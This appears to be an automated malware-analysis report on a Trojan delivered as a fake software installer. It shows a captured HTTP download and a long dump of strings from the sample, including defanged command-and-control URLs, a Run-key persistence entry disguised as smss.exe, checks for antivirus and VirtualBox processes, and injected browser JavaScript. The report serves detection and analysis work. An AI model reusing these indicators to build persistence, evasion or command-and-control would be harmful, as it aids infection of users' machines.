GET /updata/shuai/BlueSoftSetup_bszfp.exe HTTP/1.1
Host: VVV.zhanzhangsoft.com
Accept: */*
Referer: hXXp://VVV.zhanzhangsoft.com/updata/shuai
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=28280610-
Pragma: no-cache
Cache-Control: no-cache
Connection: close


HTTP/1.1 206 Partial Content
Connection: close
Date: Wed, 17 Sep 2014 08:00:13 GMT
Content-Length: 18368322
Content-Type: application/octet-stream
Content-Location: hXXp://VVV.zhanzhangsoft.com/updata/shuai/BlueSoftSetup_bszfp.exe
Content-Range: bytes 28280610-46648931/46648932
Last-Modified: Mon, 01 Sep 2014 01:41:18 GMT
Accept-Ranges: bytes
ETag: "16e222d385c5cf1:413e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
....(..x....A.E..."..Q:..qn(FN..[%....e..h...8.......2{..P.......w[..}
...d.$g.USJ~...j8..V..nD|W...>.`...^...G.Us...\....ldcD..m.....<
c.w..........7~...Q...q.'@..sGa2.c.._.Yo_..#...>^...#Z;...a..M5...&
..&S.....z. .....Kt>{fY............Jk.....m.....C.R`.%..5.?.....$..
......4.$B....o..Bc>.8.8..I..'$.7.1..... J..>..[.?.p\...uo.C{..M
WmR...R'...x...~O...;W.}.n.[.....a..$y.f.^........Bocr...M..(\#.[.TB'.
..:........6..ua-..R,......#.-.| ^K= .I.......d.9....e...!.Q.j..V...-.
...y....~......D.....}8.......} V.:,...A...=d$.sZ.c.P..Yw.U._. (..O...
..Oi..v;....G.._._E...[..............[!....D.Nt.......&\.(......Z|....
.....;...?@......`. ..O....u.}...K....H..!NK[......'... L...a...).~...
'[email protected] .[...}.......{r.C.....}....M.} .........w*r.(w)C....
.%v.0...Cp.J!.v>........T.<[email protected]:..Ux,'.9..
..7P.......5.h.....&S................ ....s.s.b.6..@|].)$i..(".......g
......D..0.......3.H...c....TQj.. .H..S..*.E..J...=w!`.OKl#[email protected]....
.a.-..:5.0>r.m.o..!RIB.(..0..PF.<.$....vs.pz.....F..(g../ ..4(I.
.....Q..e.$5......Vz..Y...!'Z`7j.U..;.LJP..c.uS.`um...r_kPm..i...YQ.r.
..........(...(.u...'.dI.{[email protected] .{.hk"#&..v..y..._g.6o.}...u...@_5....
U......ZS.=.5.L.....1...$...X....V>...}o]h.#..._u...7.........".0D.
..H.r.ge..L......?..G1.l.........xa.D.R.3.I...=D..8.0k. .....&.jB`.p.Z
.*.n........M.....v..v..B.6.&.ZZ.9%.Aek9y..)m..J^t.....D.LiO...WiW....
.....a0.....1...MkFB..p/.....\.......-_.....~...."...D)a.~."...h.c...-
......?..G..1..........O....R......?0W ...F.V...~....@...).z...I6G
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_912:

@.rsrc
.data
t$(SSh
~%UVW
u$SShe
wininet.dll
winmm.dll
ole32.dll
user32.dll
OLEACC.DLL
gdiplus.dll
kernel32.dll
gdi32.dll
advapi32.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
GdiplusShutdown
MsgWaitForMultipleObjects
RegCreateKeyA
RegOpenKeyA
RegEnumKeyA
RegCloseKey
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
QQPCTray.exe
360tray.exe
c:\smss.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss
%Program Files%\Internet Explorer\iexplore.exe
6.lnk
7.lnk
chrome.lnk
chrome
Opera.lnk
Opera
Mozilla Firefox.lnk
Mozilla Firefox
Google Chrome.lnk
Google Chrome
config.ini
.html
hXXp://56.doudousoft.com/ini/oem/
hXXp://56.doudousoft.com/ini/liuliang/gengxin.html
hXXp://56.doudousoft.com/ini/liuliang/config.html
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXps://
hXXp://
[email protected]
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
text|password|file
comdlg32.dll
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
P!T%s
.eW7,
,hV.ke
/&%FiAm
.dqg{}
6f/w.dy
k>.XN
al.OU=?Z
.rik[
9.cY"
v,>.RGj9
 I.yI,s
m<)x.VQ&
%rf.%X
s.GE-
.VIVk
O$f.iWe_
;m.xa
Z^Mz.gi
$%H%U
m>%F[gb
J#.NN
@#f.yT
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.0
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
(*.htm;*.html)|*.htm;*.html
its:%s::%s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
%original file name%.exe
<META http-equiv=Content-Type content="text-html; charset=Windows-1252"></HEAD>
<TD id=tableProps vAlign=top align=left><IMG id=pagerrorImg height=33 src="pagerror.gif" width=25></TD>
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
.idata
.edata
P.reloc
P.rsrc
.reloc
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
W:\3rdparty\ScreamSec\SecUtils.pas
TCipher.CreateIntf: Algorithm mismatch
TBlockCipher.CreateIntf: Wrong VectorSize
Cipher mode not supported
The vector for %s is %d blocks. Cannot initialize with a %d block vector.
The block size for %s is %d bytes and the key is %d bytes. Cannot initialize with a %d block vector.
The minimum key and IV size for %s is %d bytes.
Not supported
TRijndael_PipedPCFB
Rijndael: Invalid key size - %d
2.16.840.1.101.3.4.1.1
2.16.840.1.101.3.4.1.21
2.16.840.1.101.3.4.1.41
1.3.6.1.4.1.13085.1.22
1.3.6.1.4.1.13085.1.23
1.3.6.1.4.1.13085.1.24
2.16.840.1.101.3.4.1.4
2.16.840.1.101.3.4.1.24
2.16.840.1.101.3.4.1.44
1.3.6.1.4.1.13085.1.7
1.3.6.1.4.1.13085.1.8
1.3.6.1.4.1.13085.1.9
1.3.6.1.4.1.13085.1.4
1.3.6.1.4.1.13085.1.5
1.3.6.1.4.1.13085.1.6
1.3.6.1.4.1.13085.1.10
1.3.6.1.4.1.13085.1.11
1.3.6.1.4.1.13085.1.12
1.3.6.1.4.1.13085.1.1
1.3.6.1.4.1.13085.1.2
1.3.6.1.4.1.13085.1.3
1.3.6.1.4.1.13085.1.16
1.3.6.1.4.1.13085.1.17
1.3.6.1.4.1.13085.1.18
2.16.840.1.101.3.4.1.2
2.16.840.1.101.3.4.1.22
2.16.840.1.101.3.4.1.42
1.3.6.1.4.1.13085.1.19
1.3.6.1.4.1.13085.1.20
1.3.6.1.4.1.13085.1.21
2.16.840.1.101.3.4.1.3
2.16.840.1.101.3.4.1.23
2.16.840.1.101.3.4.1.43
2.16.840.1.101.3.4.1.5
2.16.840.1.101.3.4.1.25
2.16.840.1.101.3.4.1.45
/* Dr Brian Gladman ([email protected]) 14th January 1999 */
TGenerator.Create: Cipher mode must be cmCTR.
TMPPool.CheckThreadID: Called from the wrong thread.
TMPPool.Cache: Invalid pointer
TMPPool.Obtain: Out of memory
TMPPool.InternalCheck: Invalid pointer
Portugal
Turkey
TKeyVerifyParams
12345678-
.Rdj)
Windows 95
WIN_VER_WINDOWS95
Windows 95 OSR2
WIN_VER_WINDOWS95OSR2
Windows 98
WIN_VER_WINDOWS98
Windows 98 SE
WIN_VER_WINDOWS98SE
Windows ME
WIN_VER_WINDOWSME
Windows 2000
WIN_VER_WINDOWS2000
Windows 2000 Professional
WIN_VER_WINDOWS2000PROF
Windows 2000 Data Server
WIN_VER_WINDOWS2000DATASERVER
Windows 2000 Advanced Server
WIN_VER_WINDOWS2000ADVSERVER
Windows 2000 Server
WIN_VER_WINDOWS2000SERVER
Windows XP
WIN_VER_WINDOWSXP
Windows XP Home
WIN_VER_WINDOWSXPHOME
Windows XP Professional
WIN_VER_WINDOWSXPPROF
Windows XP Professional x64
WIN_VER_WINDOWSXPPROFx64
Windows XP Professional Datacenter x64
WIN_VER_WINDOWSXPPROFDATACENTERx64
Windows XP Professional Enterprise x64
WIN_VER_WINDOWSXPPROFENERPRICEx64
Windows XP Professional Standart x64
WIN_VER_WINDOWSXPPROFSTANDARTx64
Windows 2003
Windows 2003 Server
WIN_VER_WINDOWS2003SERVER
Windows 2003 Server R2
WIN_VER_WINDOWS2003SERVERR2
Windows 2003 Storage Server
WIN_VER_WINDOWS2003STORAGESERVER
Windows 2003 Datacenter Itanium
WIN_VER_WINDOWS2003DATACENTERITANIUM
Windows 2003 Enterprise Itanium
WIN_VER_WINDOWS2003ENTERPRICEITANIUM
Windows 2003 Datacenter x64
WIN_VER_WINDOWS2003DATACENTERx64
Windows 2003 Enterprise x64
WIN_VER_WINDOWS2003ENERPRICEx64
Windows 2003 Standart x64
WIN_VER_WINDOWS2003STANDARTx64
Windows 2003 Compute
WIN_VER_WINDOWS2003COMPUTE
Windows 2003 Datacenter
WIN_VER_WINDOWS2003DATACENTER
Windows 2003 Enterprise
WIN_VER_WINDOWS2003ENTERPRICE
Windows 2003 Web
WIN_VER_WINDOWS2003WEB
Windows 2003 Standart
WIN_VER_WINDOWS2003STANDART
Windows Vista
WIN_VER_WINDOWSVISTA
Windows Vista Business
WIN_VER_WINDOWSVISTA_BUSINESS
Windows Vista Cluster Server
WIN_VER_WINDOWSVISTA_CLUSTER_SERVER
Windows Vista Datacenter Server
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER
Windows Vista Datacenter Server Core
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_CORE
Windows Vista Datacenter Server Core V
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_CORE_V
Windows Vista Datacenter Server V
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_V
Windows Vista Enterprise
WIN_VER_WINDOWSVISTA_ENTERPRICE
Windows Vista Enterprise Server
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER
Windows Vista Enterprise Server Core
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_CORE
Windows Vista Enterprise Server V
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_V
Windows Vista Enterprise Server Core V
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_CORE_V
Windows Vista Enterprise Server IA64
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_IA64
Windows Vista Home Basic
WIN_VER_WINDOWSVISTA_HOME_BASIC
Windows Vista Home Premium
WIN_VER_WINDOWSVISTA_HOME_PREMIUM
Windows Vista Home Server
WIN_VER_WINDOWSVISTA_HOME_SERVER
Windows Vista Server For Small Business
WIN_VER_WINDOWSVISTA_SERVER_FOR_SMALLBUSINESS
Windows Vista Small Business Server
WIN_VER_WINDOWSVISTA_SMALLBUSINESS_SERVER
Windows Vista Small Business Server Premium
WIN_VER_WINDOWSVISTA_SMALLBUSINESS_SERVER_PREMIUM
Windows Vista Medium Business Server Management
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows Vista Medium Business Server Messaging
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_MESSAGING
Windows Vista Medium Business Server Security
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_SECURITY
Windows Vista Standard Server
WIN_VER_WINDOWSVISTA_STANDARD_SERVER
Windows Vista Standard Server V
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_V
Windows Vista Standard Server Core
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_CORE
Windows Vista Standard Server Core V
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_CORE_V
Windows Vista Starter
WIN_VER_WINDOWSVISTA_STARTER
Windows Vista Storage Enterprise Server
WIN_VER_WINDOWSVISTA_STORAGE_ENTERPRISE_SERVER
Windows Vista Storage Express Server
WIN_VER_WINDOWSVISTA_STORAGE_EXPRESS_SERVER
Windows Vista Storage Standard Server
WIN_VER_WINDOWSVISTA_STORAGE_STANDARD_SERVER
Windows Vista Storage Workgroup Server
WIN_VER_WINDOWSVISTA_STORAGE_WORKGROUP_SERVER
Windows Vista Undefined
WIN_VER_WINDOWSVISTA_UNDEFINED
Windows Vista Ultimate
WIN_VER_WINDOWSVISTA_ULTIMATE
Windows Vista Web Server
WIN_VER_WINDOWSVISTA_WEB_SERVER
Windows Vista Web Server Core
WIN_VER_WINDOWSVISTA_WEB_SERVER_CORE
Windows Vista Unlicensed
WIN_VER_WINDOWSVISTA_UNLICENSED
Windows 2008
WIN_VER_WINDOWS2008
Windows 2008 Business
WIN_VER_WINDOWS2008_BUSINESS
Windows 2008 Cluster Server
WIN_VER_WINDOWS2008_CLUSTER_SERVER
Windows 2008 Datacenter Server
WIN_VER_WINDOWS2008_DATACENTER_SERVER
Windows 2008 Datacenter Server Core
WIN_VER_WINDOWS2008_DATACENTER_SERVER_CORE
Windows 2008 Datacenter Server Core V
WIN_VER_WINDOWS2008_DATACENTER_SERVER_CORE_V
Windows 2008 Datacenter Server V
WIN_VER_WINDOWS2008_DATACENTER_SERVER_V
Windows 2008 Enterprise
WIN_VER_WINDOWS2008_ENTERPRICE
Windows 2008 Enterprise Server
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER
Windows 2008 Enterprise Server Core
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_CORE
Windows 2008 Enterprise Server V
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_V
Windows 2008 Enterprise Server Core V
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_CORE_V
Windows 2008 Enterprise Server IA64
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_IA64
Windows 2008 Home Basic
WIN_VER_WINDOWS2008_HOME_BASIC
Windows 2008 Home Premium
WIN_VER_WINDOWS2008_HOME_PREMIUM
Windows 2008 Home Server
WIN_VER_WINDOWS2008_HOME_SERVER
Windows 2008 Server For Small Business
WIN_VER_WINDOWS2008_SERVER_FOR_SMALLBUSINESS
Windows 2008 Small Business Server
WIN_VER_WINDOWS2008_SMALLBUSINESS_SERVER
Windows 2008 Small Business Server Premium
WIN_VER_WINDOWS2008_SMALLBUSINESS_SERVER_PREMIUM
Windows 2008 Medium Business Server Management
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 2008 Medium Business Server Messaging
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 2008 Medium Business Server Security
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_SECURITY
Windows 2008 Standard Server
WIN_VER_WINDOWS2008_STANDARD_SERVER
Windows 2008 Standard Server V
WIN_VER_WINDOWS2008_STANDARD_SERVER_V
Windows 2008 Standard Server Core
WIN_VER_WINDOWS2008_STANDARD_SERVER_CORE
Windows 2008 Standard Server Core V
WIN_VER_WINDOWS2008_STANDARD_SERVER_CORE_V
Windows 2008 Starter
WIN_VER_WINDOWS2008_STARTER
Windows 2008 Storage Enterprise Server
WIN_VER_WINDOWS2008_STORAGE_ENTERPRISE_SERVER
Windows 2008 Storage Express Server
WIN_VER_WINDOWS2008_STORAGE_EXPRESS_SERVER
Windows 2008 Storage Standard Server
WIN_VER_WINDOWS2008_STORAGE_STANDARD_SERVER
Windows 2008 Storage Workgroup Server
WIN_VER_WINDOWS2008_STORAGE_WORKGROUP_SERVER
Windows 2008 Undefined
WIN_VER_WINDOWS2008_UNDEFINED
Windows 2008 Ultimate
WIN_VER_WINDOWS2008_ULTIMATE
Windows 2008 Web Server
WIN_VER_WINDOWS2008_WEB_SERVER
Windows 2008 Web Server Core
WIN_VER_WINDOWS2008_WEB_SERVER_CORE
Windows 2008 Unlicensed
WIN_VER_WINDOWS2008_UNLICENSED
Windows 2008 R2
WIN_VER_WINDOWS2008R2
Windows 2008 R2 Business
WIN_VER_WINDOWS2008R2_BUSINESS
Windows 2008 R2 Cluster Server
WIN_VER_WINDOWS2008R2_CLUSTER_SERVER
Windows 2008 R2 Datacenter Server
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER
Windows 2008 R2 Datacenter Server Core
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_CORE
Windows 2008 R2 Datacenter Server Core V
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_CORE_V
Windows 2008 R2 Datacenter Server V
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_V
Windows 2008 R2 Enterprise
WIN_VER_WINDOWS2008R2_ENTERPRICE
Windows 2008 R2 Enterprise Server
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER
Windows 2008 R2 Enterprise Server Core
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_CORE
Windows 2008 R2 Enterprise Server V
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_V
Windows 2008 R2 Enterprise Server Core V
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_CORE_V
Windows 2008 R2 Enterprise Server IA64
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_IA64
Windows 2008 R2 Home Basic
WIN_VER_WINDOWS2008R2_HOME_BASIC
Windows 2008 R2 Home Premium
WIN_VER_WINDOWS2008R2_HOME_PREMIUM
Windows 2008 R2 Home Server
WIN_VER_WINDOWS2008R2_HOME_SERVER
Windows 2008 R2 Server For Small Business
WIN_VER_WINDOWS2008R2_SERVER_FOR_SMALLBUSINESS
Windows 2008 R2 Small Business Server
WIN_VER_WINDOWS2008R2_SMALLBUSINESS_SERVER
Windows 2008 R2 Small Business Server Premium
WIN_VER_WINDOWS2008R2_SMALLBUSINESS_SERVER_PREMIUM
Windows 2008 R2 Medium Business Server Management
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 2008 R2 Medium Business Server Messaging
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 2008 R2 Medium Business Server Security
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_SECURITY
Windows 2008 R2 Standard Server
WIN_VER_WINDOWS2008R2_STANDARD_SERVER
Windows 2008 R2 Standard Server V
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_V
Windows 2008 R2 Standard Server Core
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_CORE
Windows 2008 R2 Standard Server Core V
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_CORE_V
Windows 2008 R2 Starter
WIN_VER_WINDOWS2008R2_STARTER
Windows 2008 R2 Storage Enterprise Server
WIN_VER_WINDOWS2008R2_STORAGE_ENTERPRISE_SERVER
Windows 2008 R2 Storage Express Server
WIN_VER_WINDOWS2008R2_STORAGE_EXPRESS_SERVER
Windows 2008 R2 Storage Standard Server
WIN_VER_WINDOWS2008R2_STORAGE_STANDARD_SERVER
Windows 2008 R2 Storage Workgroup Server
WIN_VER_WINDOWS2008R2_STORAGE_WORKGROUP_SERVER
Windows 2008 R2 Undefined
WIN_VER_WINDOWS2008R2_UNDEFINED
Windows 2008 R2 Ultimate
WIN_VER_WINDOWS2008R2_ULTIMATE
Windows 2008 R2 Web Server
WIN_VER_WINDOWS2008R2_WEB_SERVER
Windows 2008 R2 Web Server Core
WIN_VER_WINDOWS2008R2_WEB_SERVER_CORE
Windows 2008 R2 Unlicensed
WIN_VER_WINDOWS2008R2_UNLICENSED
Windows 7
WIN_VER_WINDOWSSEVEN
Windows 7 Business
WIN_VER_WINDOWSSEVEN_BUSINESS
Windows 7 Cluster Server
WIN_VER_WINDOWSSEVEN_CLUSTER_SERVER
Windows 7 Datacenter Server
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER
Windows 7 Datacenter Server Core
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_CORE
Windows 7 Datacenter Server Core V
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_CORE_V
Windows 7 Datacenter Server V
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_V
Windows 7 Enterprise
WIN_VER_WINDOWSSEVEN_ENTERPRICE
Windows 7 Enterprise Server
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER
Windows 7 Enterprise Server Core
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_CORE
Windows 7 Enterprise Server V
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_V
Windows 7 Enterprise Server Core V
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_CORE_V
Windows 7 Enterprise Server IA64
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_IA64
Windows 7 Home Basic
WIN_VER_WINDOWSSEVEN_HOME_BASIC
Windows 7 Home Premium
WIN_VER_WINDOWSSEVEN_HOME_PREMIUM
Windows 7 Home Server
WIN_VER_WINDOWSSEVEN_HOME_SERVER
Windows 7 Server For Small Business
WIN_VER_WINDOWSSEVEN_SERVER_FOR_SMALLBUSINESS
Windows 7 Small Business Server
WIN_VER_WINDOWSSEVEN_SMALLBUSINESS_SERVER
Windows 7 Small Business Server Premium
WIN_VER_WINDOWSSEVEN_SMALLBUSINESS_SERVER_PREMIUM
Windows 7 Medium Business Server Management
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 7 Medium Business Server Messaging
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 7 Medium Business Server Security
WIN_VER_WINDOWSSEVEN_MEDIUMBUSINESS_SERVER_SECURITY
Windows 7 Standard Server
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER
Windows 7 Standard Server V
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_V
Windows 7 Standard Server Core
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_CORE
Windows 7 Standard Server Core V
WIN_VER_WINDOWSSEVEN_STANDARD_SERVER_CORE_V
Windows 7 Starter
WIN_VER_WINDOWSSEVEN_STARTER
Windows 7 Storage Enterprise Server
WIN_VER_WINDOWSSEVEN_STORAGE_ENTERPRISE_SERVER
Windows 7 Storage Express Server
WIN_VER_WINDOWSSEVEN_STORAGE_EXPRESS_SERVER
Windows 7 Storage Standard Server
WIN_VER_WINDOWSSEVEN_STORAGE_STANDARD_SERVER
Windows 7 Storage Workgroup Server
WIN_VER_WINDOWSSEVEN_STORAGE_WORKGROUP_SERVER
Windows 7 Undefined
WIN_VER_WINDOWSSEVEN_UNDEFINED
Windows 7 Ultimate
WIN_VER_WINDOWSSEVEN_ULTIMATE
Windows 7 Web Server
WIN_VER_WINDOWSSEVEN_WEB_SERVER
Windows 7 Web Server Core
WIN_VER_WINDOWSSEVEN_WEB_SERVER_CORE
Windows 7 Unlicensed
WIN_VER_WINDOWSSEVEN_UNLICENSED
Portuguese (Brazil)
Portuguese (Portugal)
Enigma_Plugin_OnSaveKey
Enigma_Plugin_OnLoadKey
ntdll.dll
LS_Enigma_Plugin_OnDeleteKey
comctl32.dll
!"#$%&*;<=>@[]^_`{|}
TNT Internal Error: TWideComponentHelper.Create should never be encountered.
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntClasses.pas
Library not found: %s
Function not found: %s.%s
RtlFormatCurrentUserKeyPath
TExported0
USER32.DLL
EInvalidGraphicOperation
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
Uhe%f
MAPI32.DLL
TComboBoxExEnumerator
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
HelpKeyword
OnExecute
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
AutoHotkeys
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
imm32.dll
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntActnList.pas
PasswordChard
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntStdCtrls.pas
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntForms.pas
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntMenus.pas
Internal Error: SyncHotKeyPosition Failed ("%s" <> "%s").
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntControls.pas
Internal Error: SubClassUnicodeControl.Control is not Unicode.
.UnicodeClass
TntUnicodeVcl.DestroyWindow
Internal Error: Control does not support ITntGlyphButton.
dtPostMsg
Software\Microsoft\Windows\CurrentVersion
ProductKey
Software\Microsoft\Windows NT\CurrentVersion
\\.\PhysicalDrive0
\\.\%s
\\.\Scsi0:
\\.\SMARTVSD
%Program Files% (x86)\TntWare\Delphi Unicode Controls\Source\TntRegistry.pas
#$%&'()* ,-./01234
PSAPI.dll
VBoxService.exe
ÞFAULT FOLDER%
%SYSTEM FOLDER%
%WINDOWS FOLDER%
Mutex object: Unique: %d-%d. Number: %d
THookWindowsAPI
EP_RegCheckKey
EP_RegCheckKeyA
EP_RegCheckKeyW
EP_RegSaveKey
EP_RegSaveKeyA
EP_RegSaveKeyW
EP_RegLoadKey
EP_RegLoadKeyA
EP_RegLoadKeyW
EP_RegLoadAndCheckKey
EP_RegCheckAndSaveKey
EP_RegCheckAndSaveKeyA
EP_RegCheckAndSaveKeyW
EP_RegDeleteKey
EP_RegKeyExpirationDate
EP_RegKeyExpirationDateEx
EP_RegKeyCreationDate
EP_RegKeyCreationDateEx
EP_RegKeyExecutions
EP_RegKeyExecutionsTotal
EP_RegKeyExecutionsLeft
EP_RegKeyDays
EP_RegKeyDaysTotal
EP_RegKeyDaysLeft
EP_RegKeyRuntime
EP_RegKeyRuntimeTotal
EP_RegKeyRuntimeLeft
EP_RegKeyGlobalTime
EP_RegKeyGlobalTimeTotal
